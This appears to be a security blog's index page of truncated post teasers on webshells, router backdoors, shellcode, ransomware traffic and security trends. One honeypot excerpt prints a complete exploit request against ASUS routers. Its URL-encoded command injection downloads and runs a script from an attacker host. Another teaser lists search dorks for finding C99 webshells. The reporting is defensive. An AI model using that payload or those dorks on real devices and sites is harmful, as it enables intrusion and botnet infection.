Do we need an Internet Policing Force with all power? I can still download malware from a site that was published weeks ago…..

Most of the readers here know that I am not a fan of over policing and abuse of power…etc. However, the internet isn’t under just any one jurisdiction (although just about most people think the USA is that).   There are a lot more sites out there now then ever scanning and posting malicious sites … Read more

Every Google Dork Webshell C99shell Saudi Shell Huge List Of Searches

powered by captain crunch security team safe-mode: off (not secure) home basel 2.2 safe-mode: off (not secure) drwxrwxrwx c99memoryl c99shell [file on secure ok ] c99shell v. 1.0 pre-release build #16 hacker uid=99(nobody) gid=99(nobody) groups=99(nobody) –[ c99shell v. 1.0 pre-release build #16 basel c99shell v. 1.0 pre-release build powered by captain crunch security team | … Read more

New Linux Backdoor found in the wild TheMoon family of malware ASUS Router NTTPD Vulnerability

New Linux Backdoor found in the wild on one of our honeypots – This bot belongs to the TheMoon family of malware The vulnerable ASUS router will  download and execute the binary file .nttpd from the attacker controlled website.   POST /hndUnblock.cgi HTTP/1.0 \r\nAccept: */*\r\n Host:\r\n User-Agent: Wget(linux)\r\n Content-Length: 414\r\n Content-Type: application/x-www-form-urlencoded submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%66%6C%6F%77%65%72%74%6F%77%65%72%73%62%6C%61%62%6C%61%2E%74%6F%70%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1′ … Read more

What is the IEEE? What Standards are Bluetooth, Wireless, Cable, Fiber

The IEEE is an acronym for the Institute of Electrical and Electronics Engineers. These are a bunch of scientists and students who together are a leading authority in the aerospace, telecommunications, biomedical engineering, electric power, etc. The IEEE consists of more than 365000 members from around the world. The IEEE was formed in 1963 by … Read more

REINCARNA Linux.Wifatch Malware Whitehat Backdoor made by the good guys? How illegal is this?

So last night I did a little banner grabbing from some IP ranges that have been historically extremely insecure, I”m not a blackhat hacker anymore so my intentions weren’t to exploit these hopeless incompetent victims but I would have notified them. I have considered the idea of compromising them just to patch them and save … Read more

Writing Shellcode for Buffer Overflows – Avoiding Bad Characters

Depending on the application, vulnerability type, and protocols in use, there may be certain characters that are considered “bad” and should not be used in your buffer, return address, or shellcode. One example of a common bad character (especially in buffer overflows caused by unchecked string copy operations) is the null byte (0x00). This character is considered bad because … Read more

Malspam E-mail Leads to Ransomware Cerber/Zerber Infection TRAFFIC SAMPLE

Malspam E-mail Leads to Ransomware Cerber/Zerber Infection TRAFFIC SAMPLE Example of files that were encrypted and protected:   The domain name was NX and not required for the purchase process. 2016-12-16 01:29:05.256362 IP > Flags [P.], seq 0:303, ack 1, win 256, length 303: HTTP: GET //up1/1/4fv3b5.exe HTTP/1.1 E..W..@……..fH……P.n……P…….GET //up1/1/4fv3b5.exe HTTP/1.1 Accept: application/x-shockwave-flash, … Read more

Cyber Security Trends in 2016 – Denial of Service and Webshells on the rise

According to several security research firms 2015 saw a massive decline in the number of reported malware infections, a decline in exploit activity of 84% compared to that of 2013. The few active exploit kits worth noting were Angler, Neutrino and Rig but besides those three there were virtually no other major campaigns detected in … Read more